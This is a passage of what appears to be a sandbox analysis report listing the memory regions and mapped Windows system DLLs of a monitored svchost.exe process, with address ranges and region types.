"\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1407 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1408 start_va = 0x480000 end_va = 0x607fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1409 start_va = 0x610000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 1410 start_va = 0x7a0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1411 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1412 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 1413 start_va = 0x8f0000 end_va = 0x90bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1414 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 1415 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1416 start_va = 0x930000 end_va = 0x93ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1417 start_va = 0x940000 end_va = 0x941fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1418 start_va = 0x960000 end_va = 0x979fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1419 start_va = 0x980000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1420 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1421 start_va = 0x9a0000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1422 start_va = 0x9b0000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1423 start_va = 0x9c0000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 1424 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1425 start_va = 0xa50000 end_va = 0xab5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1426 start_va = 0xb40000 end_va = 0xb40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1427 start_va = 0xbd0000 end_va = 0xe9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1428 start_va = 0xea0000 end_va = 0xea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1429 start_va = 0xeb0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 1430 start_va = 0xf30000 end_va = 0xf3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 1431 start_va = 0xf40000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1432 start_va = 0xf50000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 1433 start_va = 0xf60000 end_va = 0xf6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 1434 start_va = 0xf70000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1435 start_va = 0xf80000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 1436 start_va = 0xf90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1437 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 1438 start_va = 0xfb0000 end_va = 0xfb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 1439 start_va = 0xfc0000 end_va = 0xfc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 1440 start_va = 0xfd0000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1441 start_va = 0x1050000 end_va = 0x1050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 1442 start_va = 0x1060000 end_va = 0x1060fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 1443 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 1444 start_va = 0x1080000 end_va = 0x1087fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 1445 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 1446 start_va = 0x10a0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1447 start_va = 0x1120000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 1448 start_va = 0x1130000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 1449 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 1450 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1451 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1452 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 1453 start_va = 0x1180000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 1454 start_va = 0x1190000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1455 start_va = 0x11a0000 end_va = 0x11affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1456 start_va = 0x11b0000 end_va = 0x11bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1457 start_va = 0x11c0000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1458 start_va = 0x1240000 end_va = 0x1247fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 1459 start_va = 0x1250000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 1460 start_va = 0x1260000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 1461 start_va = 0x1270000 end_va = 0x1277fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 1462 start_va = 0x1280000 end_va = 0x128ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 1463 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1464 start_va = 0x12e0000 end_va = 0x135ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 1465 start_va = 0x13d0000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013d0000" filename = "" Region: id = 1466 start_va = 0x1460000 end_va = 0x14dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 1467 start_va = 0x14e0000 end_va = 0x155ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 1468 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 1469 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 1470 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1471 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 1472 start_va = 0x1770000 end_va = 0x17effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1473 start_va = 0x1830000 end_va = 0x18affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 1474 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1475 start_va = 0x1940000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001940000" filename = "" Region: id = 1476 start_va = 0x1980000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001980000" filename = "" Region: id = 1477 start_va = 0x19e0000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1478 start_va = 0x1ab0000 end_va = 0x1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 1479 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1480 start_va = 0x1bd0000 end_va = 0x1c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1481 start_va = 0x1c50000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 1482 start_va = 0x1d60000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 1483 start_va = 0x1e60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 1484 start_va = 0x1f90000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1485 start_va = 0x2080000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1486 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1487 start_va = 0x2270000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002270000" filename = "" Region: id = 1488 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1489 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1490 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1491 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 1492 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1493 start_va = 0x27d0000 end_va = 0x28cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 1494 start_va = 0x2a50000 end_va = 0x2b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1495 start_va = 0x2bd0000 end_va = 0x2ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 1496 start_va = 0x2cd0000 end_va = 0x2d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 1497 start_va = 0x2dd0000 end_va = 0x2e8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1498 start_va = 0x2ec0000 end_va = 0x2f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 1499 start_va = 0x3090000 end_va = 0x310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1500 start_va = 0x3110000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 1501 start_va = 0x3330000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1502 start_va = 0x33b0000 end_va = 0x342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 1503 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 1504 start_va = 0x3540000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1505 start_va = 0x35c0000 end_va = 0x363ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1506 start_va = 0x3740000 end_va = 0x37bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 1507 start_va = 0x37e0000 end_va = 0x385ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 1508 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1509 start_va = 0x3b30000 end_va = 0x3baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b30000" filename = "" Region: id = 1510 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 1511 start_va = 0x3dc0000 end_va = 0x3e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 1512 start_va = 0x3ea0000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 1513 start_va = 0x42d0000 end_va = 0x434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 1514 start_va = 0x4460000 end_va = 0x44dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1515 start_va = 0x4500000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1516 start_va = 0x4620000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 1517 start_va = 0x4720000 end_va = 0x479ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1518 start_va = 0x47a0000 end_va = 0x499ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047a0000" filename = "" Region: id = 1519 start_va = 0x4ab0000 end_va = 0x4b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ab0000" filename = "" Region: id = 1520 start_va = 0x4b30000 end_va = 0x4c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1521 start_va = 0x4c30000 end_va = 0x4d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c30000" filename = "" Region: id = 1522 start_va = 0x4e10000 end_va = 0x4e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e10000" filename = "" Region: id = 1523 start_va = 0x4e20000 end_va = 0x4f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 1524 start_va = 0x4f40000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 1525 start_va = 0x4fc0000 end_va = 0x5fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1526 start_va = 0x5fc0000 end_va = 0x60bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005fc0000" filename = "" Region: id = 1527 start_va = 0x60c0000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060c0000" filename = "" Region: id = 1528 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1529 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1530 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1531 start_va = 0x779d0000 end_va = 0x779d6fff monitored = 0 entry_point = 0x779d106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1532 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1533 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1534 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1535 start_va = 0xff300000 end_va = 0xff30afff monitored = 0 entry_point = 0xff30246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1536 start_va = 0x7fef0ae0000 end_va = 0x7fef0d32fff monitored = 0 entry_point = 0x7fef0ae236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1537 start_va = 0x7fef1ff0000 end_va = 0x7fef2004fff monitored = 0 entry_point = 0x7fef1ff1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1538 start_va = 0x7fef2010000 end_va = 0x7fef2054fff monitored = 0 entry_point = 0x7fef2043644 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1539 start_va = 0x7fef2060000 end_va = 0x7fef2071fff monitored = 0 entry_point = 0x7fef20690bc region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1540 start_va = 0x7fef2550000 end_va = 0x7fef2621fff monitored = 0 entry_point = 0x7fef25e1a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1541 start_va = 0x7fef2630000 end_va = 0x7fef28a9fff monitored = 0 entry_point = 0x7fef2662200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1542 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1543 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1544 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1545 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1546 start_va = 0x7fef4980000 end_va = 0x7fef498efff monitored = 0 entry_point = 0x7fef4989a48 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1547 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1548 start_va = 0x7fef4e30000 end_va = 0x7fef4ea0fff monitored = 0 entry_point = 0x7fef4e751d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1549 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1550 start_va = 0x7fef4ed0000 end_va = 0x7fef4f84fff monitored = 0 entry_point = 0x7fef4f4cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1551 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1552 start_va = 0x7fef4fa0000 end_va = 0x7fef4ff9fff monitored = 0 entry_point = 0x7fef4fddde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1553 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1554 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1555 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1556 start_va = 0x7fef50c0000 end_va = 0x7fef5121fff monitored = 0 entry_point = 0x7fef50fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1557 start_va = 0x7fef5130000 end_va = 0x7fef525bfff monitored = 0 entry_point = 0x7fef51e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1558 start_va = 0x7fef5260000 end_va = 0x7fef5279fff monitored = 0 entry_point = 0x7fef5273fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1559 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1560 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1561 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1562 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1563 start_va = 0x7fef5470000 end_va = 0x7fef5488fff monitored = 0 entry_point = 0x7fef5471104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1564 start_va = 0x7fef5490000 end_va = 0x7fef54dffff monitored = 0 entry_point = 0x7fef5491190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1565 start_va = 0x7fef54e0000 end_va = 0x7fef54e7fff monitored = 0 entry_point = 0x7fef54e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1566 start_va = 0x7fef54f0000 end_va = 0x7fef5514fff monitored = 0 entry_point = 0x7fef5508c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1567 start_va = 0x7fef5520000 end_va = 0x7fef555cfff monitored = 0 entry_point = 0x7fef5521070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: 